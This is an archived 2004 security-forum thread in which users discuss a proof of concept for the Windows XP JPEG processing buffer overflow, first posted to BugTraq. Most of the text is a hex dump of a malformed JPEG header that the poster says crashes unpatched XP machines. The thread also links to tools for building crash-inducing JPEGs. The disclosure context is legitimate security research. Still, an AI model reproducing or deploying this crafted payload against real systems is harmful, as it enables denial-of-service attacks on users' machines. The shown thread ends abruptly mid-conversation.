hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
JeiAr
Sep 16 2004, 06:09 PM
I just sent this to BugTraq today. AFAIK no POC has been made public yet except this one?

QUOTE

From: GulfTech Security [mailto:security@gulftech.org]
Sent: Thursday, September 16, 2004 12:53 PM
To: bugtraq@securityfocus.com
Subject: JPEG Processing BOF Proof Of Concept

About a year ago I came across this same issue. I came across it while messing with Solar Designer's old Netscape JPEG bug. So, in short the same issue applies to WinXP it seems. I showed the bug to a few people (even contacted Microsoft, but got no reply), but neither them nor myself ever got around to figuring it out. Nick DeBaggis and eEye did a good job of figuring this very dangerous issue out smile.gif

Anyway, the point to this post is to release the POC I just put together using the findings that I have been sitting on for quite some time. As I said before, I never fully understood exactly what was going on, so this POC doesn't execute code or anything, but it will crash any WindowsXP machine that has not been patched from this flaw.

If you cannot access the attached file, you may download the POC here

http://www.gulftech.org/?node=downloads

BTW: There was a BugTraq (or some other sec mailing list) post from over a year ago that talks about the Netscape JPEG issue crashing the WindowsXP Shell. I remember seeing them when I first started looking into this issue, but do not have links right off hand. Maybe someone else reading this does?

Yorn
Sep 16 2004, 06:34 PM
Actually JeiAr, I think the jpeg issue you were referring to was an issue listed on the VulnDev mailing list, not Bugtraq. But yeah.. interesting stuff.
brOmstar
Sep 16 2004, 06:44 PM
Yesterday an other poc was posted on www.security.nnov.ru. Just for ur info.
Kynroxes
Sep 16 2004, 07:39 PM
yeah I hope what this poc isn't copy of poc posted on security.nnov.ru, I rectified your post : brOmstar.
setthesun
Sep 16 2004, 07:43 PM
www.security.novv.ru down ?

Also this POC is just DOS.
JeiAr
Sep 16 2004, 08:23 PM
Nah, it isn't copied from security.nnov.ru. I wasn't even aware a POC had been posted elsewhere. But, like I said; i was made aware of this issue when messing with Solar Designer's Netscape JPEG issue. I used that method of creating an image that would crash XP. Not sure if that and the recently released BOF exploit it in the exact same way, maybe someone with some time on their hands can compare the two for difference, and obvious similarities smile.gif Also, just for reference:

http://www.securityfocus.com/archive/1/71598

And there was also talk of this issue a long time ago, don't remember where I saw it, but Yorn says it was on VulnDev so he is probably right wink.gif
chris105
Sep 16 2004, 08:54 PM
How does this work, I found the security focus link but its very basic info, is there anyway to view the code at all. Did you use an external application to append the code ? Sorry if im being dim ...
JeiAr
Sep 16 2004, 08:54 PM
Also, check these links out.

http://www.openwall.com/advisories/OW-002-...-jpeg-r1.tar.gz
http://www.openwall.com/advisories/OW-002-1.zip

Solar Designer made a tool to create malformed JPEG's to crash netscape, and since it is kinda the same issue it should work for XP. If anyone gets a chance to check this out and confirm it works let us know wink.gif
JeiAr
Sep 16 2004, 09:02 PM
QUOTE (chris105 @ Sep 16 2004, 08:54 PM)
How does this work, I found the security focus link but its very basic info, is there anyway to view the code at all. Did you use an external application to append the code ? Sorry if im being dim ...

Nah man, i just copied the malformed header from the Netscape JPEG Crash to my own to show that this issue does indeed affect XP (The Netscape Issue)

Here is what was appended to the JPEG I made (hex)

[CODE]
FFD8 FFFE 1006 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878 7878
7878 7878 7878 7878 7878 7878 7878 7878 7878 FFFE 0001 FFFE 1002 2020
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000
A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000
0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40 F8EF FFBF
0000 0000 0000 0000 A854 2A40 F8EF FFBF 0000 0000 0000 0000 A854 2A40
F8EF FFBF 0000 FFE0 0010
[CODE]

also, attached is the old netscaope crash jpeg that im sure alot of you remember tongue.gif

Yorn
Sep 17 2004, 01:44 PM
You want to see something *REALLY* wierd though?

